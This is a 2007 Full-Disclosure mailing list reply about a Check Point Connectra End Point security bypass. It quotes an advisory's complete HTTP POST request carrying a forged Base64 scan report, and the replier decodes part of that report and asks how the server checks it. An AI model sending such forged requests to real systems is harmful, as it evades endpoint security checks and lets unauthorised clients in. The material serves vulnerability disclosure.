Re: [Full-disclosure] Check Point Connectra End Point security bypass Jan 22 2007 01:19PM
Felix Lindner (fx sabre-labs com)

On Mon, 22 Jan 2007 07:37:29 +0200
"Roni Bachar" <roni (at) (dot) il [email concealed]> wrote:
> The vulnerability can be exploited by doing the following stages:
> Sending a post request as followed:
> POST https://serverip/sre/params.php HTTP/1.1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: ICS_Secure
> Host: serverip
> Content-Length: 251
> Cache-Control: no-cache
> Cookie: ICS_Test_Cookie=1
> Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzL
> TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ
> WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvP
> 1NyZVNjYW5SZXBvcnQ+Cg==

I assume you meant saying that the Base64 encoded Data in the Report variable
must be adjusted to reflect the actual hostname etc., or is params.php
accepting _any_ report that looks reasonably valid?

For reference, the decoded data in this example is:
<?xml version="1.0"?>

<SreScanReport Version="">
<UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and


SABRE Labs GmbH | Felix 'FX' Lindner <fx (at) sabre-labs (dot) com [email concealed]> | GSM: +49 171 7402062
Wrangelstrasse 4 | PGP: A740 DE51 9891 19DF 0D05
10997 Berlin, Germany | 13B3 1759 C388 C92D 6BBB

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus